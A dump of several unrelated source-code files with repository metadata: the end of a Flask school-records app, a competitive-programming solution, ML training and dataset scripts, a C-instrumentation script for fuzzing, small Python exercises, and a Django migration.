                db.execute("INSERT INTO students (firstname, lastname, fathername, contact, gender, dob, address, class, admissiondate, monthlyfee, imgURL) VALUES (:firstname, :lastname, :fathername, :contact, :gender, :dob, :address, :class_, :admissiondate, :monthlyfee, :imgURL)", firstname=firstname, lastname=lastname, fathername=fathername, contact=contact, gender=gender, dob=dob, address=address, class_=class_, admissiondate=admissiondate, monthlyfee=int(monthlyfee), imgURL=imgURL)
            return jsonify([{"status": "success", "msg": "Changes saved."}])
    else:
        return redirect(url_for("home"))
### Delete student based on student ID
@app.route("/deletestudent/<id>", methods=["GET", "POST"])
def deletestudent(id):
    """Delete a student, their test/fee records, and their stored image.

    Security fix: this mutating endpoint previously had no login check,
    unlike every other route in the app — it now requires a session.
    """
    if not g.user:
        return redirect(url_for("home"))
    students = db.execute("SELECT * FROM students WHERE id=:id", id=int(id))
    imgExt = students[0]["imgURL"]
    imgExt = imgExt.split(".")
    imgExt = imgExt[-1]
    try:
        # Remove the profile image; ignore if it never existed on disk.
        os.remove(os.path.join(THIS_FOLDER_G + "/static/img/db/students/", "student_" + id + "." + imgExt))
    except:
        pass
    db.execute("DELETE FROM students WHERE id=:id", id=int(id))
    db.execute("DELETE FROM testrecords WHERE studentID=:studentID", studentID=int(id))
    db.execute("DELETE FROM feerecords WHERE studentID=:studentID", studentID=int(id))
    return redirect(url_for("students"))
'''
Test Records
'''
### Main test records page
@app.route("/testrecords")
def testrecords():
    """Landing page for test records."""
    if not g.user:
        return redirect(url_for("home"))
    return render_template("testrecords.html", records=db.execute("SELECT * FROM testrecords"))
### View all test records page
@app.route("/alltestrecords")
def alltestrecords():
    """Show every test record, newest first."""
    if not g.user:
        return redirect(url_for("home"))
    newest_first = db.execute("SELECT * FROM testrecords")
    newest_first.reverse()
    return render_template("alltestrecords.html", records=newest_first)
### View test record of a specific student based on student ID
@app.route("/testrecord/<id>")
def fetchtestrecord(id):
    """Show one student's test history, newest record first."""
    if not g.user:
        return redirect(url_for("home"))
    history = db.execute("SELECT * FROM testrecords WHERE studentID=:id", id=int(id))
    if not history:
        return render_template("notfound.html", msg="Record Not Found.")
    history.reverse()
    return render_template("studenttestrecord.html", records=history)
### Add test record of a specific student based on student ID
@app.route("/addtestrecords/<i>")
def addtestrecords(i):
    """Render the add-test-records form with *i* blank entry rows."""
    if not g.user:
        return redirect(url_for("home"))
    return render_template("addtestrecords.html", i=int(i))
### Add new fee record according to student ID page
@app.route("/addstudenttestrecord/<id>")
def addstudenttestrecord(id):
    """Render the add-test-record form pre-targeted at student *id*."""
    if not g.user:
        return redirect(url_for("home"))
    return render_template("addtestrecords.html", i=1, id=id)
### Add new test records via ajax
@app.route("/addnewtestrecord", methods=["POST"])
def addnewtestrecord():
    """Insert a new test record for a student (AJAX endpoint).

    Validates presence and integer-ness of the numeric fields, denormalises
    the student's name/father's name/class into the record, and stores the
    percentage (integer-truncated) alongside the raw marks.
    """
    if g.user:
        if request.method == "POST":
            studentID = request.values.get("studentID")
            date = request.values.get("date")
            subject = request.values.get("subject")
            description = request.values.get("description")
            totalmarks = request.values.get("totalmarks")
            obtainedmarks = request.values.get("obtainedmarks")
            remarks = request.values.get("remarks")
            # description and remarks are optional; everything else is required.
            if studentID == "" or date == "" or subject == "" or totalmarks == "" or obtainedmarks == "":
                return jsonify([{"status": "error", "msg": "Incomplete data."}])
            elif RepresentsInt(studentID) != True or RepresentsInt(totalmarks) != True or RepresentsInt(obtainedmarks) != True:
                return jsonify([{"status": "error", "msg": "Incompatible data."}])
            student = db.execute("SELECT * FROM students WHERE id=:id", id=int(studentID))
            if len(student) < 1:
                return jsonify([{"status": "error", "msg": "No Student with entered ID."}])
            db.execute("INSERT INTO testrecords (studentID, studentName, studentFrName, date, class, subject, description, totalmarks, obtainedmarks, obtainedpercentage, remarks) VALUES (:studentID, :studentName, :studentFrName, :date, :class_, :subject, :description, :totalmarks, :obtainedmarks, :obtainedpercentage, :remarks)", studentID=int(student[0]["id"]), studentName=str(student[0]["firstname"] + " " + student[0]["lastname"]), studentFrName=student[0]["fathername"], date=date, class_=student[0]["class"], subject=subject, description=description, totalmarks=int(totalmarks), obtainedmarks=int(obtainedmarks), obtainedpercentage=int(int(obtainedmarks)/int(totalmarks)*100), remarks=remarks)
            return jsonify([{"status": "success", "msg": "Changes saved."}])
    else:
        return redirect(url_for("home"))
### Edit test record
@app.route("/edittestrecord/<id>")
def edittestrecord(id):
    """Edit form for a single test record (root admins only)."""
    if not (g.user and g.role == "root"):
        return redirect(url_for("home"))
    rows = db.execute("SELECT * FROM testrecords WHERE id=:id", id=int(id))
    if not rows:
        return render_template("notfound.html", msg="Record Not Found.")
    return render_template("edittestrecord.html", i=1, record=rows[0])
### Update test record via ajax
@app.route("/updatetestrecord/<id>", methods=["POST"])
def updatetestrecord(id):
    """Update every column of an existing test record (root only, AJAX).

    Validates the required fields, recomputes the percentage from the posted
    marks, and rewrites each column with a separate UPDATE.
    """
    if g.user and g.role == "root":
        if request.method == "POST":
            id = id
            studentID = request.values.get("studentID")
            studentName = request.values.get("studentName")
            studentFrName = request.values.get("studentFrName")
            date = request.values.get("date")
            class_ = request.values.get("class")
            subject = request.values.get("subject")
            description = request.values.get("description")
            totalmarks = request.values.get("totalmarks")
            obtainedmarks = request.values.get("obtainedmarks")
            remarks = request.values.get("remarks")
            if studentID == "" or studentName == "" or studentFrName == "" or date == "" or class_ == "" or subject == "" or totalmarks == "" or obtainedmarks == "":
                return jsonify([{"status": "error", "msg": "Incomplete data."}])
            elif RepresentsInt(studentID) != True or RepresentsInt(totalmarks) != True or RepresentsInt(obtainedmarks) != True:
                return jsonify([{"status": "error", "msg": "Incompatible data."}])
            student = db.execute("SELECT * FROM students WHERE id=:id", id=int(studentID))
            if len(student) < 1:
                return jsonify([{"status": "error", "msg": "No Student with entered ID."}])
            db.execute("UPDATE testrecords SET studentID=:studentID WHERE id=:id", studentID=studentID, id=int(id))
            db.execute("UPDATE testrecords SET studentName=:studentName WHERE id=:id", studentName=studentName, id=int(id))
            db.execute("UPDATE testrecords SET studentFrName=:studentFrName WHERE id=:id", studentFrName=studentFrName, id=int(id))
            db.execute("UPDATE testrecords SET date=:date WHERE id=:id", date=date, id=int(id))
            db.execute("UPDATE testrecords SET class=:class_ WHERE id=:id", class_=class_, id=int(id))
            db.execute("UPDATE testrecords SET subject=:subject WHERE id=:id", subject=subject, id=int(id))
            db.execute("UPDATE testrecords SET description=:description WHERE id=:id", description=description, id=int(id))
            db.execute("UPDATE testrecords SET totalmarks=:totalmarks WHERE id=:id", totalmarks=totalmarks, id=int(id))
            db.execute("UPDATE testrecords SET obtainedmarks=:obtainedmarks WHERE id=:id", obtainedmarks=obtainedmarks, id=int(id))
            # Percentage is stored denormalised; recompute it from the new marks.
            db.execute("UPDATE testrecords SET obtainedpercentage=:obtainedpercentage WHERE id=:id", obtainedpercentage=int(int(obtainedmarks)/int(totalmarks)*100), id=int(id))
            db.execute("UPDATE testrecords SET remarks=:remarks WHERE id=:id", remarks=remarks, id=int(id))
            return jsonify([{"status": "success", "msg": "Changes saved."}])
    else:
        return redirect(url_for("home"))
### Delete test record based on record ID
@app.route("/deletetestrecord/<id>", methods=["GET", "POST"])
def deletetestrecord(id):
    """Delete one test record by its row id.

    Security fix: this mutating endpoint previously had no login check,
    unlike every other route in the app — it now requires a session.
    """
    if not g.user:
        return redirect(url_for("home"))
    db.execute("DELETE FROM testrecords WHERE id=:id", id=int(id))
    return redirect(url_for("testrecords"))
'''
Fee Records
'''
### Main fee records page
@app.route("/feerecords")
def feerecords():
    """Landing page for fee records."""
    if not g.user:
        return redirect(url_for("home"))
    return render_template("feerecords.html", records=db.execute("SELECT * FROM feerecords"))
### View all fee records page
@app.route("/allfeerecords")
def allfeerecords():
    """Show every fee record, newest first."""
    if not g.user:
        return redirect(url_for("home"))
    newest_first = db.execute("SELECT * FROM feerecords")
    newest_first.reverse()
    return render_template("allfeerecords.html", records=newest_first)
### View fee record of a specific student based on student ID
@app.route("/feerecord/<id>")
def fetchfeerecord(id):
    """Show one student's fee history, newest record first."""
    if not g.user:
        return redirect(url_for("home"))
    history = db.execute("SELECT * FROM feerecords WHERE studentID=:id", id=int(id))
    if not history:
        return render_template("notfound.html", msg="Record Not Found.")
    history.reverse()
    return render_template("studentfeerecord.html", records=history)
### Add fee record of a specific student based on student ID
@app.route("/addfeerecords/<i>")
def addfeerecords(i):
    """Render the add-fee-records form with *i* blank entry rows."""
    if not g.user:
        return redirect(url_for("home"))
    return render_template("addfeerecords.html", i=int(i))
### Add new fee record according to student ID page
@app.route("/addstudentfeerecord/<id>")
def addstudentfeerecord(id):
    """Render the add-fee-record form pre-targeted at student *id*."""
    if not g.user:
        return redirect(url_for("home"))
    return render_template("addfeerecords.html", i=1, id=id)
### Add new fee records via ajax
@app.route("/addnewfeerecord", methods=["POST"])
def addnewfeerecord():
    """Insert a new fee record for a student (AJAX endpoint).

    Validates the fields, denormalises the student's name/father's name into
    the record, and returns the inserted row id so the client can offer a
    receipt download immediately.
    """
    if g.user:
        if request.method == "POST":
            studentID = request.values.get("studentID")
            date = request.values.get("date")
            feefor = request.values.get("feefor")
            depositedfee = request.values.get("depositedfee")
            if studentID == "" or date == "" or feefor == "" or depositedfee == "":
                return jsonify([{"status": "error", "msg": "Incomplete data."}])
            elif RepresentsInt(studentID) != True or RepresentsInt(depositedfee) != True:
                return jsonify([{"status": "error", "msg": "Incompatible data."}])
            student = db.execute("SELECT * FROM students WHERE id=:id", id=int(studentID))
            if len(student) < 1:
                return jsonify([{"status": "error", "msg": "No Student with entered ID."}])
            # db.execute returns the new row's id for INSERTs here.
            lastR_ID = db.execute("INSERT INTO feerecords (studentID, studentName, studentFrName, date, feefor, depositedfee) VALUES (:studentID, :studentName, :studentFrName, :date, :feefor, :depositedfee)", studentID=int(student[0]["id"]), studentName=str(student[0]["firstname"] + " " + student[0]["lastname"]), studentFrName=student[0]["fathername"], date=date, feefor=feefor, depositedfee=int(depositedfee))
            return jsonify([{"status": "success", "msg": "Changes saved.", "lastrowID": lastR_ID}])
    else:
        return redirect(url_for("home"))
### Download fee receipt
@app.route("/downloadfeereceipt/<id>")
def downloadfeereceipt(id):
    """Render the printable fee-receipt page for one fee record."""
    if not g.user:
        return redirect(url_for("home"))
    rows = db.execute("SELECT * FROM feerecords WHERE id=:id", id=int(id))
    if not rows:
        return render_template("notfound.html", msg="Record Not Found.")
    return render_template("downloadfeereceipt.html", msg="Download will start in a moment ...", feeRecord=rows[0])
### Edit fee record
@app.route("/editfeerecord/<id>")
def editfeerecord(id):
    """Edit form for a single fee record (root admins only)."""
    if not (g.user and g.role == "root"):
        return redirect(url_for("home"))
    rows = db.execute("SELECT * FROM feerecords WHERE id=:id", id=int(id))
    if not rows:
        return render_template("notfound.html", msg="Record Not Found.")
    return render_template("editfeerecord.html", i=1, record=rows[0])
### Update fee record via ajax
@app.route("/updatefeerecord/<id>", methods=["POST"])
def updatefeerecord(id):
    """Update every column of an existing fee record (root only, AJAX)."""
    if g.user and g.role == "root":
        if request.method == "POST":
            id = id
            studentID = request.values.get("studentID")
            studentName = request.values.get("studentName")
            studentFrName = request.values.get("studentFrName")
            date = request.values.get("date")
            feefor = request.values.get("feefor")
            depositedfee = request.values.get("depositedfee")
            if studentID == "" or studentName == "" or studentFrName == "" or date == "" or feefor == "" or depositedfee == "":
                return jsonify([{"status": "error", "msg": "Incomplete data."}])
            elif RepresentsInt(studentID) != True or RepresentsInt(depositedfee) != True:
                return jsonify([{"status": "error", "msg": "Incompatible data."}])
            # The referenced student must exist before we rewrite the record.
            student = db.execute("SELECT * FROM students WHERE id=:id", id=int(studentID))
            if len(student) < 1:
                return jsonify([{"status": "error", "msg": "No Student with entered ID."}])
            db.execute("UPDATE feerecords SET studentID=:studentID WHERE id=:id", studentID=studentID, id=int(id))
            db.execute("UPDATE feerecords SET studentName=:studentName WHERE id=:id", studentName=studentName, id=int(id))
            db.execute("UPDATE feerecords SET studentFrName=:studentFrName WHERE id=:id", studentFrName=studentFrName, id=int(id))
            db.execute("UPDATE feerecords SET date=:date WHERE id=:id", date=date, id=int(id))
            db.execute("UPDATE feerecords SET feefor=:feefor WHERE id=:id", feefor=feefor, id=int(id))
            db.execute("UPDATE feerecords SET depositedfee=:depositedfee WHERE id=:id", depositedfee=depositedfee, id=int(id))
            return jsonify([{"status": "success", "msg": "Changes saved."}])
    else:
        return redirect(url_for("home"))
### Delete fee record based on record ID
@app.route("/deletefeerecord/<id>", methods=["GET", "POST"])
def deletefeerecord(id):
    """Delete one fee record by its row id.

    Security fix: this mutating endpoint previously had no login check,
    unlike every other route in the app — it now requires a session.
    """
    if not g.user:
        return redirect(url_for("home"))
    db.execute("DELETE FROM feerecords WHERE id=:id", id=int(id))
    return redirect(url_for("feerecords"))
'''
System Settings
'''
### System settings page
@app.route("/systemsettings")
def systemsettings():
    """System settings page (root admins only)."""
    if not (g.user and g.role == "root"):
        return redirect(url_for("home"))
    return render_template("systemsettings.html")
### Get system settings via ajax
@app.route("/getsystemsettings")
def getsystemsettings():
    """Return the singleton system-settings row (id=1) as JSON (root only)."""
    if not (g.user and g.role == "root"):
        return redirect(url_for("home"))
    settings_row = db.execute("SELECT * FROM systemsettings where id=:id", id=1)
    return jsonify(settings_row)
### Save system settings changes via ajax
@app.route("/savesystemsettings", methods=["GET", "POST"])
def savesystemsettings():
    """Persist system-wide settings (root only, AJAX endpoint).

    Handles the institution name, two header display flags, and up to three
    logo uploads (png/jpg/ico), each saved as ``logo.<ext>`` and recorded in
    the singleton ``systemsettings`` row (id=1).

    Fix: removed a leftover debug ``print`` of the posted values.
    """
    if g.user and g.role == "root":
        if request.method == "POST":
            id = request.values.get("id")
            institutionname = request.values.get("institutionname")
            nameinheader = request.values.get("nameinheader")
            logoinheader = request.values.get("logoinheader")
            pngURL = request.files["pngURL"]
            jpgURL = request.files["jpgURL"]
            icoURL = request.files["icoURL"]
            if institutionname == "":
                return jsonify([{"status": "error", "msg": "Institution Name is Mandatory"}])
            # The client sends these flags as the strings "true"/"false".
            if (nameinheader != "true" and nameinheader != "false") or (logoinheader != "true" and logoinheader != "false"):
                return jsonify([{"status": "error", "msg": "Incompatible Values for true/false"}])
            if pngURL:
                if allowed_file(pngURL.filename) == True:
                    imagename = pngURL.filename
                    imageext = imagename.split(".")[-1]
                    imagename = "logo." + imageext
                    pngURL.save(os.path.join(THIS_FOLDER_G + "/static/img/system/", imagename))
                    pngURL = "../static/img/system/" + imagename
                    db.execute("UPDATE systemsettings SET pngURL=:pngURL WHERE id=:id", pngURL=pngURL, id=1)
                else:
                    return jsonify([{"status": "error", "msg": "File extension not supported."}])
            if jpgURL:
                if allowed_file(jpgURL.filename) == True:
                    imagename = jpgURL.filename
                    imageext = imagename.split(".")[-1]
                    imagename = "logo." + imageext
                    jpgURL.save(os.path.join(THIS_FOLDER_G + "/static/img/system/", imagename))
                    jpgURL = "../static/img/system/" + imagename
                    db.execute("UPDATE systemsettings SET jpgURL=:jpgURL WHERE id=:id", jpgURL=jpgURL, id=1)
                else:
                    return jsonify([{"status": "error", "msg": "File extension not supported."}])
            if icoURL:
                if allowed_file(icoURL.filename) == True:
                    imagename = icoURL.filename
                    imageext = imagename.split(".")[-1]
                    imagename = "logo." + imageext
                    icoURL.save(os.path.join(THIS_FOLDER_G + "/static/img/system/", imagename))
                    icoURL = "../static/img/system/" + imagename
                    db.execute("UPDATE systemsettings SET icoURL=:icoURL WHERE id=:id", icoURL=icoURL, id=1)
                else:
                    return jsonify([{"status": "error", "msg": "File extension not supported."}])
            db.execute("UPDATE systemsettings SET institutionname=:institutionname WHERE id=:id", institutionname=institutionname, id=1)
            db.execute("UPDATE systemsettings SET nameinheader=:nameinheader WHERE id=:id", nameinheader=nameinheader, id=1)
            db.execute("UPDATE systemsettings SET logoinheader=:logoinheader WHERE id=:id", logoinheader=logoinheader, id=1)
            return jsonify([{"status": "success", "msg": "Changes saved."}])
    else:
        return redirect(url_for("home"))
### Run Flask App
if __name__ == "__main__":
    # Development entry point; debug=True must be disabled in production.
    app.run(debug=True)
|
[
"m.ahmednoor7@yahoo.com"
] |
m.ahmednoor7@yahoo.com
|
419801dc9b41a351205b81a2536848b549bcdca3
|
67a48a7a2db56247fdd84474efa35124565fd8b9
|
/Codeforces/1567/1567a.py
|
d8ac3e266bff074dc1c8d5d2ab0d617f691e4d6f
|
[] |
no_license
|
qazz625/Competitive-Programming-Codes
|
e3de31f9276f84e919a6017b2cf781c946809862
|
e5df9cdc4714d78b7b6a7535ed7a45e07d3781c3
|
refs/heads/master
| 2022-08-30T07:57:55.172867
| 2022-08-10T08:02:07
| 2022-08-10T08:02:07
| 242,182,922
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 213
|
py
|
# Competitive-programming task: for each test case, read a move string and
# print its vertical mirror — 'L'/'R' are kept, 'D' becomes 'U', and any
# other character (i.e. 'U') becomes 'D'.
t = int(input())  # number of test cases
for _ in range(t):
    n = int(input())  # declared string length (read but unused)
    arr = []
    s = input()
    for x in s:
        if x == 'L' or x == 'R':
            arr += [x]
        elif x == 'D':
            arr += ['U']
        else:
            arr += ['D']
    print(*arr, sep='')
|
[
"arun49804@gmail.com"
] |
arun49804@gmail.com
|
1de3f0d35f4975c34f1ea90e65390c64a73f455e
|
849613f19ea52137ff0b5e8875d501ccfc77fef1
|
/3-final-forest.py
|
9e267756f65d45460f99a5798b959a45cae6280a
|
[] |
no_license
|
smutaogroup/VVD_analysis
|
bc3b3f682fb5d341cbf5033e1f007c238b26bfce
|
aa19125e4352ded93c389b945137a9dfe2bcf58e
|
refs/heads/master
| 2020-03-19T14:46:05.016613
| 2018-06-08T15:51:26
| 2018-06-08T15:51:26
| 136,638,455
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 795
|
py
|
#!/bin/env python
# Train a one-vs-one multiclass random forest on alpha-carbon trajectory
# features against macrostate labels, report training accuracy, and save
# the fitted model with joblib.
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.multiclass import OneVsOneClassifier
from msmbuilder.io import load_meta, load_trajs
import sys
from sklearn.externals import joblib
depth = 9  # max tree depth for every forest in the one-vs-one ensemble
meta, all_data = load_trajs('alpha_carbon/')
meta, all_label = load_trajs('macro-mapping/')
# Flatten the per-trajectory dicts into single stacked arrays.
all_data_one = np.concatenate(list(all_data.values()))
all_label_one = np.concatenate(list(all_label.values()))
clf = OneVsOneClassifier(RandomForestClassifier(n_estimators=100, max_depth=depth, random_state=0))
clf.fit(all_data_one, all_label_one)
# NOTE(review): accuracy is measured on the training set itself, so it
# overstates generalisation.
print (' Depth %d Train Accu: %.3f' %(
    depth, np.sum(clf.predict(all_data_one) == all_label_one) / len(all_label_one)))
## save model
joblib.dump(clf, 'ovo-randomforest/final_es100_'+str(depth)+".pkl")
|
[
"noreply@github.com"
] |
smutaogroup.noreply@github.com
|
3d27cf4f50a9cc4bd469bd18977762b572f062a1
|
ce76b3ef70b885d7c354b6ddb8447d111548e0f1
|
/company/new_problem/look_week_into_different_child/woman.py
|
adf36b9a017251053bd4003aaba072a84a85d48d
|
[] |
no_license
|
JingkaiTang/github-play
|
9bdca4115eee94a7b5e4ae9d3d6052514729ff21
|
51b550425a91a97480714fe9bc63cb5112f6f729
|
refs/heads/master
| 2021-01-20T20:18:21.249162
| 2016-08-19T07:20:12
| 2016-08-19T07:20:12
| 60,834,519
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 246
|
py
|
#! /usr/bin/env python
def right_week_or_little_person(str_arg):
    """Print *str_arg* (via the helper below) followed by the literal 'eye'."""
    seem_work_for_next_man(str_arg)
    print('eye')


def seem_work_for_next_man(str_arg):
    """Echo *str_arg* to stdout."""
    print(str_arg)


if __name__ == '__main__':
    right_week_or_little_person('place')
|
[
"jingkaitang@gmail.com"
] |
jingkaitang@gmail.com
|
0df540ab0532f179ce46a8102168e91cb9ce3765
|
c9d162af983ca149c58e045c87cc705cdb57b398
|
/instrumentor.py
|
ce07637261fdc29e825c01f93bfdcd1f4daa1063
|
[] |
no_license
|
arielazary/afl_preprocessing
|
2361f56986ce90ac56c4dc923964fd410acbe617
|
638e70c45cd453d57358b9359b4f7e46bf07e122
|
refs/heads/master
| 2020-04-25T22:47:47.500534
| 2019-02-28T14:07:16
| 2019-02-28T14:07:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 517
|
py
|
# Instrument example_1.c for fuzzing: prepend an <stdio.h> include and inject
# a scanf-driven sleep before every pthread_mutex_lock call.
#
# Fix: the original located insertion points with list.index(line), which
# returns the FIRST occurrence of the text — so duplicate lines (blank lines,
# lone '}' etc., ubiquitous in C source) caused insertions at the wrong place.
# Building the output in a single forward pass is both correct and O(n).
with open('example_1.c') as f:
    lines = f.readlines()

new_lines = []
for i, line in enumerate(lines):
    if i == 0:
        # globals
        new_lines.append('#include <stdio.h>\n')
    if "pthread_mutex_lock" in line:
        new_lines.append('float sec=0.0;\n scanf("%f", &sec);\n if (sec >= 0 && sec <= 10) sleep(sec/10);\nprintf("%f", sec);\n')
    new_lines.append(line)

with open('example_1_instrumented.c', 'w') as fw:
    fw.writelines(new_lines)
|
[
"gefenk9@gmail.com"
] |
gefenk9@gmail.com
|
d9defe5ad47eb503e1e8834bad3974c9f76ea1ae
|
33fc4f5b3b92fc5d84be6c4872094264be5c2192
|
/108numpy-copy-deepcopy.py
|
c41df93204747de028547d6883e0e74eb2590112
|
[] |
no_license
|
greenmac/python-morvan-numpy-pandas
|
2ee9f572b910f65b44fe76316774fa9f604e9eb2
|
77fe010b15074e7ecabaefc07bc80bf667575d89
|
refs/heads/master
| 2020-04-12T14:54:47.317643
| 2018-12-22T07:18:19
| 2018-12-22T07:18:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 602
|
py
|
# https://morvanzhou.github.io/tutorials/data-manipulation/np-pd/2-8-np-copy/
# Demonstrates aliasing vs. deep copy for NumPy arrays: plain assignment
# shares the underlying data, while .copy() makes an independent array.
import numpy as np
# a = np.arange(4)
# b = a
# c = a
# d = b
# a[0] = 11
# print(a)
# print(b)
# print(c)
# print(d)
# print(b is a)
# print(d is a)
# a = np.arange(4)
# b = a
# c = a
# d = b
# a[0] = 11
# d[1:3] = [22, 33]
# print(a)
# print(b)
# print(c)
# print(d)
a = np.arange(4)
b = a
c = a
d = b
a[0] = 11
d[1:3] = [22, 33]
b = a.copy()  # deep copy: b now owns its own data and is no longer linked to a
a[3] = 44
print(a)
print(b)  # b is a deep copy, so b[3] is unaffected by the a[3] = 44 above
print(c)
print(d)
|
[
"alwaysmac@msn.com"
] |
alwaysmac@msn.com
|
b192d349f8113f13b7778ea0a5d27e09e99aba44
|
e7b8c14b4f590f1a1d41a8bf01c3acbdb4f32215
|
/sumListNumbers.py
|
b68643f0b2cf641e37298d2f49cc8522f78084f2
|
[] |
no_license
|
gocersensei/python
|
6e11c8cc2bef1c93127465249b83b6b5571950dd
|
d7bcb16c80c7f79a5ed2d08b77258d18db4d96c1
|
refs/heads/master
| 2023-07-28T08:50:11.628297
| 2021-09-14T11:06:39
| 2021-09-14T11:06:39
| 287,108,426
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 727
|
py
|
#
# Compute the sum of numbers entered by the user,
# ignoring non-numeric input (EAFP: attempt the conversion, catch ValueError)
#
# Read the first line of input from the user
line = input("Enter a number: ")
total = 0
# Keep reading until the user enters a blank line
while line != "":
    try:
        # Try and convert the line to a number
        num = float(line)
        # If the conversion succeeds then add it to the total and display it
        total = total + num
        print("The total is now", total)
    except ValueError:
        # Display an error message before going on to read the next value
        print("That wasn't a number.")
    # Read the next number
    line = input("Enter a number: ")
# Display the total
print("The grand total is", total)
|
[
"gocersensei@gmail.com"
] |
gocersensei@gmail.com
|
96862019c227fd93b2d73f7b636aa92661f6a361
|
98a3b6e871d9aea29c480402d85bf25bb7f11c1f
|
/train_nitre_data.py
|
a20c63c48a00b94bf40e8a633ea5c14510361e0d
|
[] |
no_license
|
funnyday16/HardGAN
|
eb2e543d00b2886fbec6f75f729f34b2ed39db7a
|
abe9f6959179bab9bbd7ef929ae4c2af735ec691
|
refs/heads/master
| 2023-02-17T13:28:50.607523
| 2021-01-18T07:07:47
| 2021-01-18T07:07:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,995
|
py
|
"""
paper: GridDehazeNet: Attention-Based Multi-Scale Network for Image Dehazing
file: train_data.py
about: build the training dataset
author: Xiaohong Liu
date: 01/08/19
"""
# --- Imports --- #
import torch.utils.data as data
from PIL import Image
from random import randrange
from torchvision.transforms import Compose, ToTensor, Normalize
import torchvision.transforms as tfs
from torchvision.transforms import functional as FF
import random
import os
from glob import glob
import re
# --- Training dataset --- #
class TrainData(data.Dataset):
    """Training dataset of (hazy, ground-truth) image pairs for dehazing.

    All images are decoded once into in-memory caches at construction
    time; each __getitem__ applies a random rescale, random crop, random
    horizontal flip and random 90-degree rotation, then converts the
    pair to tensors.
    """

    def __init__(self, crop_size, train_data_dir, train_data_gt):
        """
        :param crop_size: (width, height) of the random crop.
        :param train_data_dir: directory holding the hazy ``*.png`` images.
        :param train_data_gt: ground-truth directory; assumed to end with a
            path separator, since file names are appended to it directly.
        """
        super().__init__()
        fpaths = glob(os.path.join(train_data_dir, '*.png'))
        haze_names = []
        gt_names = []
        for path in fpaths:
            haze_names.append(path.split('/')[-1])
            # GT file name is the leading token of the hazy file name.
            gt = path.split('/')[-1].split('_')[0].split('.')[0]
            if '2019' in train_data_gt:
                # The 2019 set names its ground-truth files "<id>_GT.png".
                gt = gt + '_GT'
            gt_names.append(str(gt) + '.png')
        self.haze_names = haze_names
        self.gt_names = gt_names
        self.crop_size = crop_size
        self.train_data_dir = train_data_dir
        self.train_data_gt = train_data_gt
        # Decode every image once up front and keep it in memory.
        self.haze_cache = {}
        self.gt_cache = {}
        for haze_name in haze_names:
            if haze_name in self.haze_cache:
                continue
            haze_img = Image.open(self.train_data_dir + '/' + haze_name).convert('RGB')
            self.haze_cache[haze_name] = haze_img
        for gt_name in gt_names:
            if gt_name in self.gt_cache:
                continue
            gt_img = Image.open(self.train_data_gt + gt_name).convert('RGB')
            self.gt_cache[gt_name] = gt_img
        print('use cache')

    def generate_scale_label(self, haze, gt):
        """Rescale both images by the same random factor in [0.8, 1.5]."""
        f_scale = 0.8 + random.randint(0, 7) / 10.0
        width, height = haze.size
        haze = haze.resize((int(width * f_scale), (int(height * f_scale))), resample=Image.BICUBIC)
        gt = gt.resize((int(width * f_scale), (int(height * f_scale))), resample=Image.BICUBIC)
        return haze, gt

    def get_images(self, index):
        """Return (haze, gt, haze_gt) tensors for one augmented pair.

        :raises Exception: if the scaled image is smaller than the crop,
            or if either tensor does not have exactly 3 channels.
        """
        crop_width, crop_height = self.crop_size
        haze_name = self.haze_names[index]
        gt_name = self.gt_names[index]
        haze_img = self.haze_cache[haze_name]
        gt_img = self.gt_cache[gt_name]
        haze_img, gt_img = self.generate_scale_label(haze_img, gt_img)
        width, height = haze_img.size
        if width < crop_width or height < crop_height:
            raise Exception('Bad image size: {}'.format(gt_name))
        # --- x,y coordinate of left-top corner of the random crop --- #
        x, y = randrange(0, width - crop_width + 1), randrange(0, height - crop_height + 1)
        haze_crop_img = haze_img.crop((x, y, x + crop_width, y + crop_height))
        gt_crop_img = gt_img.crop((x, y, x + crop_width, y + crop_height))
        # Apply the same flip/rotation to both images of the pair.
        rand_hor = random.randint(0, 1)
        rand_rot = random.randint(0, 3)
        haze_crop_img = tfs.RandomHorizontalFlip(rand_hor)(haze_crop_img)
        gt_crop_img = tfs.RandomHorizontalFlip(rand_hor)(gt_crop_img)
        if rand_rot:
            haze_crop_img = FF.rotate(haze_crop_img, 90 * rand_rot)
            gt_crop_img = FF.rotate(gt_crop_img, 90 * rand_rot)
        # --- Transform to tensor; only the hazy input is normalized --- #
        transform_haze = Compose([ToTensor(), Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
        transform_gt = Compose([ToTensor()])
        haze = transform_haze(haze_crop_img)
        gt = transform_gt(gt_crop_img)
        haze_gt = transform_gt(gt_crop_img)
        # Fix: compare channel counts with != instead of `is not`, which
        # tests object identity and is unreliable for int literals.
        if haze.shape[0] != 3 or gt.shape[0] != 3:
            raise Exception('Bad image channel: {}'.format(gt_name))
        return haze, gt, haze_gt

    def __getitem__(self, index):
        return self.get_images(index)

    def __len__(self):
        return len(self.haze_names)
|
[
"noreply@github.com"
] |
funnyday16.noreply@github.com
|
e8ce8039f52567811f2bdb20c09583453a843219
|
018fa2ef4c1a7e4797549951a56784f5409c0f92
|
/user/migrations/0001_initial.py
|
1711546fb46d563d64e3b99407f2d4f040bf9340
|
[] |
no_license
|
dyx77421088/studentManage
|
ab2f6c25acd0331b1047f2abccca433e26c33a29
|
890cc936368654ab438171fad2392bcd61efb4bc
|
refs/heads/master
| 2022-11-22T19:48:54.452622
| 2020-07-14T10:18:09
| 2020-07-14T10:18:09
| 279,074,124
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 843
|
py
|
# Generated by Django 3.0.8 on 2020-07-13 16:20
from django.db import migrations, models
class Migration(migrations.Migration):
    # Initial migration of the user app: creates the User table.
    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('user_name', models.CharField(max_length=255, verbose_name='用户名')),
                ('password', models.CharField(max_length=255, verbose_name='密码')),
                # Phone number is unique and acts as the login identifier.
                ('phone_number', models.CharField(max_length=255, unique=True, verbose_name='手机号')),
            ],
